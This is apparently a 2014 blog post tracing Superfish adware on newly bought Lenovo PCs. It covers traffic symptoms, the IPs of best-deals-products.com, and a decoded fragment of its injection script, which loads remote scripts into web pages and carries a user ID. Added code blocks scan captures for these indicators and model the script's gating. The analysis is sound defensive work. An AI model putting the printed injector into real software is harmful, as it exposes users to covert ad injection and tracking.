Tuesday, December 9, 2014

Where does this www.best-deals-products.com malware come from, and how do you remove it?

Recently I was approached by three or four Internet users who were having problems accessing some websites.

The common background and symptoms of their problems:

1) They had all JUST purchased a Lenovo PC or laptop, loaded with the latest Windows 8.1.

2) Of course, the device came preloaded with Lenovo software, a free AV (McAfee Internet Security in their cases), etc.

3) They had no problem browsing most websites, but some sites would render blank, or partially blank, or just look different from the same site on other machines.

Here are the troubleshooting steps:

Long story short, the following were ruled out as the culprit: Windows 8.1, Internet Explorer 11, Java 8u25, McAfee Internet Security.

Having had the chance to run a basic HTTP traffic capture on one of the victims' machines, a trace of the malware surfaced...


What is this hidden traffic to www.best-deals-products.com???
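As an added example (not part of the original post), here is how the same finding can be pulled out of a capture automatically rather than by eye. It scans an HTTP capture exported one request per line for the indicators discussed on this page: any host under best-deals-products.com, the /ws/main.jsp and /ws/userData.jsp endpoints, and destination IPs in 66.70.34.0/24 (the range the domain has resolved to in the passive DNS history below). The line format "<time> <client-ip> <server-ip> <method> <url>" and the sample lines are assumptions made for the example; adapt the parser to whatever your capture tool exports.

```javascript
// Added example, not code from the original post or from Superfish.
// Scans a one-request-per-line HTTP capture for the best-deals-products.com
// indicators described in the post. Runs under Node.js (uses the global URL).
'use strict';

const IOC_DOMAIN = 'best-deals-products.com';
const IOC_PATHS = new Set(['/ws/main.jsp', '/ws/userData.jsp']);

// True when ip is inside 66.70.34.0/24, the range seen in the DNS history.
function inIocRange(ip) {
  const octets = ip.split('.').map(Number);
  if (octets.length !== 4 || octets.some((o) => !Number.isInteger(o) || o < 0 || o > 255)) {
    return false;
  }
  return octets[0] === 66 && octets[1] === 70 && octets[2] === 34;
}

// Assumed line format: "<time> <client-ip> <server-ip> <method> <url>".
// Returns null for lines that do not fit, so junk in the export is skipped.
function parseLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length < 5) return null;
  const [time, clientIp, serverIp, method, rawUrl] = parts;
  let url;
  try { url = new URL(rawUrl); } catch (e) { return null; }
  return { time, clientIp, serverIp, method, url };
}

// One finding per suspicious request, including the tracking parameters the
// injected script sends (dlsource = distribution build, userid, ver).
function scanCapture(text) {
  const findings = [];
  for (const line of text.split('\n')) {
    const r = parseLine(line);
    if (!r) continue;
    const host = r.url.hostname; // already lowercased by URL parsing
    const reasons = [];
    if (host === IOC_DOMAIN || host.endsWith('.' + IOC_DOMAIN)) reasons.push('ioc-domain');
    if (IOC_PATHS.has(r.url.pathname)) reasons.push('ioc-path');
    if (inIocRange(r.serverIp)) reasons.push('ioc-ip-range');
    if (reasons.length === 0) continue;
    findings.push({
      time: r.time,
      clientIp: r.clientIp,
      serverIp: r.serverIp,
      host,
      path: r.url.pathname,
      dlsource: r.url.searchParams.get('dlsource'),
      userid: r.url.searchParams.get('userid'),
      ver: r.url.searchParams.get('ver'),
      reasons,
    });
  }
  return findings;
}

// Constructed sample capture (not real traffic): two benign requests and two
// hits built from the URLs quoted in this post.
const SAMPLE_CAPTURE = `
10:12:01 192.168.1.20 93.184.216.34 GET http://example.com/index.html
10:12:02 192.168.1.20 66.70.34.103 GET http://www.best-deals-products.com/ws/main.jsp?dlsource=hdrykzc
10:12:02 192.168.1.20 93.184.216.34 GET http://example.com/style.css
10:12:03 192.168.1.20 66.70.34.113 GET http://www.best-deals-products.com/ws/userData.jsp?dlsource=mhgqyvl&userid=NTBCNTBC&ver=14.08.21.4
`;

const FINDINGS = scanCapture(SAMPLE_CAPTURE);
for (const f of FINDINGS) {
  console.log(`${f.time} ${f.clientIp} -> ${f.host}${f.path} [${f.reasons.join(',')}] ` +
              `dlsource=${f.dlsource} userid=${f.userid} ver=${f.ver}`);
}
```

The dlsource value is worth keeping in the output: the decoded script further down treats dlsource=hdrykzc as the Lenovo build, so it tells you which distribution channel put the software on the machine.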

Googling the background of the malware (?) revealed more details:

The real culprit is possibly Superfish, which appears under several names:
http://superfish.com/
They also own this software: SUPERFISH INC VISUAL DISCOVERY
SimilarProducts (the same name shows up as the window.similarproducts global in the decoded script further down)

This Superfish firm has gone through several rounds of funding (search Crunchbase).

According to who.is records (GoDaddy is the host) and the past resolutions recorded on virustotal.com, this malware domain points to servers in a shared (possibly virtual) server farm in New Jersey, US.

The address keeps moving; today it resolves to 66.70.34.103 or 66.70.34.113. The past resolutions recorded on VirusTotal all fall within 66.70.34.0/24:

2014-06-19 66.70.34.125
2014-06-11 66.70.34.103
2014-06-11 66.70.34.115
2014-06-03 66.70.34.111
2014-05-29 66.70.34.105
2014-05-25 66.70.34.113
2014-05-02 66.70.34.117
2014-04-17 66.70.34.127
2014-04-14 66.70.34.251
2014-04-09 66.70.34.119
2014-04-08 66.70.34.129
2014-04-06 66.70.34.101

Furthermore, thanks to jsunpack.jeek.org, we can see that this malware specifically targets Lenovo machines:
http://jsunpack.jeek.org/?report=81918a09b771ebd6691bde5067e5f748decdb46f

One of the decoded files from www.best-deals-products.com/ws/main.jsp?dlsource=hdrykzc is reproduced below (line breaks restored; the captured fragment ends just after the Lenovo check).
Take note of the "Patch for Lenovo - do not run on https sites" check near the end (highlighted in red in the original post): the Lenovo build is identified by dlsource=hdrykzc.

   if (window == top && !window.similarproducts && navigator.appVersion.toLowerCase().indexOf('msie 7') == -1) {
     (function(){
       var windowLocation = location.href.toLowerCase();
       var nofish = false;
       var metaTags = document.getElementsByTagName('meta');
       var metaTag;
       for (var i=0, l=metaTags.length; i<l; i++){
         metaTag = metaTags[i];
         if (metaTag.getAttribute('name') && metaTag.getAttribute('name').toLowerCase() == 'superfish' &&
             metaTag.getAttribute('content') && metaTag.getAttribute('content').toLowerCase() == 'nofish'){
           nofish = true;
           break;
         }
       }
       if (windowLocation.search(/\.google\./i) !== -1 &&
           windowLocation.search(/^https?:\/\/(www|play)\.google\.(?!com\/analytics\/)/i) === -1){
         nofish = true;
       }
       //if  (nofish || !(windowLocation.indexOf('.google.') == -1 || windowLocation.indexOf('play.google.com') != -1 || (windowLocation.indexOf('www.google.') != -1 && windowLocation.indexOf('www.google.com/analytics/') == -1)))
       if  (nofish){
         return;
       }
       window.similarproducts = {};
       similarproducts.b = {
         inj : function( d, url, js, cb) {
           if (window.location.protocol.indexOf( "https" ) > -1 && url.indexOf( "localhost" ) == -1) {
             url = url.replace("http:","https:");
           } else {
             url = url.replace("https","http");
           }
           var h = d.getElementsByTagName('head')[0];
           var s = d.createElement( js ? "script" : 'link' );
           if( js ){
             s.type = "text/javascript";
             s.src = url;
           } else {
             s.rel = "stylesheet";
             s.href = url;
           }
           if(cb){
             s.onload = ( function( prm ){ return function(){ cb( prm ); }; })( url );
             // IE
             s.onreadystatechange = ( function( prm ) {
               return function(){
                 if (this.readyState == 'complete' || this.readyState == 'loaded') {
                   setTimeout( (function(u){ return function(){ cb( u ); }; })(prm), 300 );
                 }
               };
             })( url );
           }
           h.appendChild(s);
           return s;
         }
       };
       similarproducts.ver = {
         ver : "",
         calcAppVersion: function (){
           if(this.ver === ""){
             var CRMLastUpdate = '2014-11-17 10:37:24.555';
             var globalAppVersion = '14.11.19.1';
             var globalAppVersionDateParts = globalAppVersion.split('.');
             var globalAppVersionYear = +globalAppVersionDateParts[0] + 2000;
             var globalAppVersionMonth = +globalAppVersionDateParts[1] - 1;
             var globalAppVersionDay = +globalAppVersionDateParts[2];
             var globalAppVersionHour = +globalAppVersionDateParts[3];
             if( CRMLastUpdate !== ''){
               var CRMLastUpdateDateParts = CRMLastUpdate.split('-');
               var CRMLastUpdateYear = +CRMLastUpdateDateParts[0];
               var CRMLastUpdateMonth = +CRMLastUpdateDateParts[1] - 1;
               var CRMLastUpdateDay = +CRMLastUpdateDateParts[2].split(' ')[0];
               var CRMLastUpdateHour = +CRMLastUpdateDateParts[2].split(' ')[1].split(':')[0];
               var CRMLastUpdateMin = +CRMLastUpdateDateParts[2].split(' ')[1].split(':')[1];
               var CRMLastUpdateDate = new Date(CRMLastUpdateYear,CRMLastUpdateMonth,CRMLastUpdateDay,CRMLastUpdateHour,CRMLastUpdateMin,0,0);
               var globalAppVersionDate = new Date(globalAppVersionYear,globalAppVersionMonth,globalAppVersionDay,globalAppVersionHour,0,0,0);
               if(CRMLastUpdateDate > globalAppVersionDate){
                 this.ver = [CRMLastUpdateYear,CRMLastUpdateMonth + 1,CRMLastUpdateDay,CRMLastUpdateHour,CRMLastUpdateMin].join('.');
               } else {
                 this.ver = [globalAppVersionYear,globalAppVersionMonth + 1,globalAppVersionDay,globalAppVersionHour,'1'].join('.');
               }
             } else {
               this.ver = [globalAppVersionYear,globalAppVersionMonth + 1,globalAppVersionDay,globalAppVersionHour,'1'].join('.');
             }
           }
           return this.ver;
         }
       };
       var srcRegex = /\/sf_main\.|\/sf_conduit\.|\/sf_conduit_mam\.|\/sf_conduit_mam_app\.|\/sfw\./i; // Test for script tag src that may contain the app params query string
       var queryStringRegex = /CTID=(CT2680812|CT2652911|CT2659749|CT2695421|CT2666540)/i; // Test for "specialsavings" patch
       var retryCounter = 1; // Used in the run() function as a fallback condition after 5 attempts
       var timeoutHandle;
       function extractQueryString(){
         var queryString = '';
         var scripts = document.getElementsByTagName('script');
         var scriptSrc;
         try{
           for (var i=0, l=scripts.length; i<l; i++){
             scriptSrc = scripts[i].src;
             if (srcRegex.test(scriptSrc)){
               if (scriptSrc.indexOf('?') != -1){
                 var tempQueryString = scriptSrc.substring(scriptSrc.indexOf('?'));
                 queryString = fixQs(tempQueryString);
               }
               break;
             }
           }
         }catch(ex){
           queryString = '';
         }
         return queryString;
       }
       function fixQs(initialQS){
         var fixedQS = '?';
         initialQS.replace(new RegExp("([^?=&]+)(=([^&]*))?", "g"), function($0, $1, $2, $3){
           switch ($1){
             case 'dlsource':
               $3 = decodeURIComponent($3).replace(/^\s+|\s+$/g,"");
               break;
           }
           fixedQS = fixedQS + $1 + '=' + $3 + '&';
         });
         return fixedQS.substring(0, fixedQS.length - 1);
       }
       function loadApp(queryString){
         var appVersion = similarproducts.ver.calcAppVersion();
         queryString += (queryString == '') ? '?' : '&';
         queryString += 'ver='+appVersion;
         if (queryStringRegex.test(queryString)) // Specialsavings patch
         {
           if (queryString.indexOf('dlsource=') > -1){
             queryString = queryString.replace(/dlsource=([^&]*)?/g, 'dlsource=specialsavings_tb');
           } else {
             queryString += '&dlsource=specialsavings_tb';
           }
         }
         if (location.protocol === 'https:' && queryString.search(/dlsource=hdrykzc/i) !== -1) // Patch for Lenovo - do not run on https sites
         {
           return;
         }
         // Assign values to the global similarproducts object
         similarproducts.b.initialQS = queryString;
         // (captured fragment ends here)
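To make the gating logic of the decoded script above testable without a browser, here is an added example (my own code, not the original post's and not Superfish's) that pulls the same four decisions into one pure function: the <meta name="superfish" content="nofish"> opt-out, the google.* exclusion with its www/play exception, the "specialsavings" CTID rewrite, and the Lenovo-build HTTPS check. The function's inputs (page URL, meta content, the query string copied from the script's own src) model what the script reads from the page; the outer condition in the original (top window, not already loaded, not MSIE 7) is assumed to hold. The regular expressions and the dlsource values are taken verbatim from the decoded fragment.

```javascript
// Added example, not code from the original post or from Superfish.
// Reproduces the injection gate of the decoded best-deals-products.com script
// as a pure function so each branch can be exercised. Runs under Node.js.
'use strict';

// Copied from the decoded fragment: CTIDs that trigger the "specialsavings"
// patch, and the dlsource value that marks the Lenovo distribution build.
const SPECIALSAVINGS_CTIDS = /CTID=(CT2680812|CT2652911|CT2659749|CT2695421|CT2666540)/i;
const LENOVO_BUILD = /dlsource=hdrykzc/i;

// pageUrl: full URL of the page being visited.
// metaSuperfish: content of <meta name="superfish"> on the page, or null.
// scriptQueryString: query string the script copied from its own <script src>
//   (e.g. '?dlsource=hdrykzc'), after fixQs() in the original.
// Returns a label for the branch the original script would take.
function superfishGate(pageUrl, metaSuperfish, scriptQueryString) {
  const href = pageUrl.toLowerCase();
  const protocol = new URL(pageUrl).protocol;

  // 1. Site-level opt-out honoured by the script itself.
  if (metaSuperfish && metaSuperfish.toLowerCase() === 'nofish') {
    return 'skip: meta nofish';
  }

  // 2. Any URL containing ".google." is skipped unless it is www. or
  //    play.google.* (and even then not www.google.com/analytics/).
  if (href.search(/\.google\./i) !== -1 &&
      href.search(/^https?:\/\/(www|play)\.google\.(?!com\/analytics\/)/i) === -1) {
    return 'skip: google';
  }

  // 3. "Specialsavings" patch from loadApp(): force the dlsource channel.
  let qs = scriptQueryString;
  if (SPECIALSAVINGS_CTIDS.test(qs)) {
    qs = qs.indexOf('dlsource=') > -1
      ? qs.replace(/dlsource=([^&]*)?/g, 'dlsource=specialsavings_tb')
      : qs + '&dlsource=specialsavings_tb';
  }

  // 4. Lenovo patch: the hdrykzc build refuses to run on HTTPS pages, so the
  //    same machine shows symptoms on HTTP sites but not on HTTPS ones.
  if (protocol === 'https:' && LENOVO_BUILD.test(qs)) {
    return 'skip: lenovo build on https';
  }

  return 'inject ' + qs;
}

// Constructed scenarios (not observations from the post).
const SCENARIOS = [
  ['http://example.com/shop', null, '?dlsource=hdrykzc'],
  ['https://example.com/shop', null, '?dlsource=hdrykzc'],
  ['https://example.com/shop', null, '?dlsource=mhgqyvl'],
  ['http://example.com/', 'NoFish', '?dlsource=hdrykzc'],
  ['https://mail.google.com/mail/', null, '?dlsource=mhgqyvl'],
  ['https://www.google.com/search?q=x', null, '?dlsource=mhgqyvl'],
  ['https://www.google.com/analytics/web/', null, '?dlsource=mhgqyvl'],
  ['http://example.com/', null, '?CTID=CT2680812&dlsource=foo'],
];
for (const [url, meta, qs] of SCENARIOS) {
  console.log(`${url} meta=${meta} ${qs} -> ${superfishGate(url, meta, qs)}`);
}
```

Two practical points fall out of this. A site operator can keep the Superfish overlay off their pages by adding `<meta name="superfish" content="nofish">`, since the script checks for it before doing anything. And on the Lenovo build the injection only happens on plain-HTTP pages, so a victim comparing an HTTP and an HTTPS site will see the breakage on one and not the other, which is consistent with the "some sites look different" symptom reported above.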

In 2012, someone at fergeeks also found that Fast Save, a popular Chrome extension, carried this same infamous adware:
http://www.fergeeks.com/chrome-tips/fast-save-1-1-chrome-extension-adding-ads-causing-havoc/

Tribal Wars 2 (which I suppose is a web-based game) is affected too:
http://forum.beta.tribalwars2.com/forum/main-category/bug-section/browser-issues/browser-issue-archive/22188-can-t-login-start-the-game

A Stack Overflow user reported the same problem on a NEWLY BOUGHT Lenovo Y50:
http://stackoverflow.com/questions/27192298/can-not-open-a-particular-web-site-only-javascript-code-is-on-the-screen


I found this link on best-deals-products.com and managed to retrieve the source; can anyone help read and decipher it?
view-source:http://www.best-deals-products.com/ws/userData.jsp?dlsource=mhgqyvl&userid=NTBCNTBC&ver=14.08.21.4





========================================================================
Solution candidates:

Solution 1:
Provided by fixyourbrowser.com
- Remove using AdwCleaner
- Remove using Malwarebytes Anti-Malware

http://www.fixyourbrowser.com/removal-instructions/remove-todays-best-online-deals-ads-removal-guide/

Comment:
You cannot remove it with Malwarebytes Anti-Malware; it fails to detect it.
I am trying AdwCleaner and will update here again.

Solution 2:
Provided by teesupport.com
http://blog.teesupport.com/way-to-remove-best-deals-ads-virus-removal/

- Remove some registry entries created by the malware (to be tested)
- Remove it with SpyHunter (to be tested)